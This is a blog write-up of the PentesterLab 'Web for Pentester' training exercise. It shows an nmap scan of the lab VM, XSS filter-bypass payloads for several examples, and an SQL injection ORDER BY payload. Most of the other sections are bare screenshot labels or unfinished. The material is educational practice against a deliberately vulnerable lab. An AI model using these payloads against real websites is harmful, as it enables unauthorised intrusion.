Introduction

This is an exercise from pentesterlab which contain some of the basic web vulnerabilities.

Location

https://www.pentesterlab.com/exercises/web_for_pentester

Getting started

To get a view on what is running, I start with a nmap scan.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.5
Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-09 14:13 CET
Nmap scan report for 192.168.171.5
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
| ssh-hostkey:
|   1024 af:d9:da:f7:c8:4f:6e:f2:8e:53:37:8b:c8:a7:5c:7d (DSA)
|_  2048 ad:ef:c3:9f:6e:15:6c:02:33:d5:5c:71:dc:ee:1f:26 (RSA)
80/tcp  open  http    Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
|_http-title: PentesterLab &raquo; Web for Pentester
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

3 ports seem to be open: 20 (SSH), 80 (HTTP) and 389 (LDAP).
On the website are the following sections listed:

XSS
SQL injections
Directory traversal
File inlusion
Code injection
Command injection
LDAP attack
File upload
XML attack

I’m going to start from the top and work my way down.

1. XSS

When I follow this first link in the section “XSS” I find a parameter which holds the value ‘hacker’.
xss1

To test for a possible XSS vulnerability I replace the value with a piece of javascript code.
This value doesn’t get validated properly and is echoed directly back onto the page.
xss3
When viewing the source code I see that the request is echoed back without any encoding.

Hello
alert("XSS");      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

When I follow example 2 and inject the same javascript code, I get a different result.
xss2-1
When viewing the source code I see that ‘<script>’ and ‘</script>’ are filtered out. When I play with the format a little the script does gets echoed back correctly.

Hello
<scriPt>alert("XSS");</scriPt>      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

The third example has another filtering. This time the solution lies in using the following payload.

?name=<script<script>>alert('XSS')<</script>/script>

The fourth example filters on the whole ‘<script>’ and renders it useless. But when using a HTML tag, I can still get a pop-up.

?name=<img src='qwerty' onerror='alert("XSS")' />

For the rest of the examples I’m only going to write-up the correct payload.
Example 5:

?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>

Example 6:

?name=hacker"; alert("n13mant");"

Example 7:

?name=hacker'; alert('n13mant');'

Example 8:

/xss/example8.php/"><script>alert(String.fromCharCode(34, 110, 49, 51, 109, 97, 110, 116, 34))</script>

Example 9:
At current time this example doesn’t run with modern browsers. I could download an old version and run it, but I’m not. This example is easily executed by replacing #hacker with #<script>alert("n13mant")</script>.

2. SQL injections

Example 1:
sql1
Now let’s add a single quote.
sql2
Now let’s add a double quote.
sql3
So with the single quote I mess up the query. Let’s build further on that.
sql4
Example 2:
sql2-1
No space…..no problem!
sql2-2
Example 3:
Same solution works with this example, but the purpose of this example is to bypass the filter with the use of /**/.
sql3-1
Example 4:
sql4-1
Example 5:
sql5-1
Example 6:
sql6-1
Example 7:
Before URL encoding.
sql7-1

After URL encoding.
sql7-2
Example 8:

?order=IF%282,%20name,age%29

3. Directory traversal

Example 1:
pt1-1
Example 2:
pt2-1
Example 3:
pt3-1

4. File inclusion

Example 1:
fi1-1
So far I got a Local File Inclusion. Now to get a Remote File Inclusion. For this I’ve created a php file with phpinfo() in it.
fi1-2
Example 2:
fi2-2
fi2-1

5. Code injection

Example 1:
code_inj1-1
Example 2:
code_inj2-1
Example 3:
The regex got modified to search and replace n13mant with n13mant/e , which causes ‘hacker’ to be interpreted as php code.
code_inj3-1
Example 4:
code_inj4-1

6. Command injection

To be continued….

7. LDAP attack

To be continued….

8. File upload

To be continued….

9. XML attack

To be continued….

Web for pentester I

Introduction

Location

Getting started

1. XSS

2. SQL injections

3. Directory traversal

4. File inclusion

5. Code injection

6. Command injection

7. LDAP attack

8. File upload

9. XML attack

Leave a Reply Cancel reply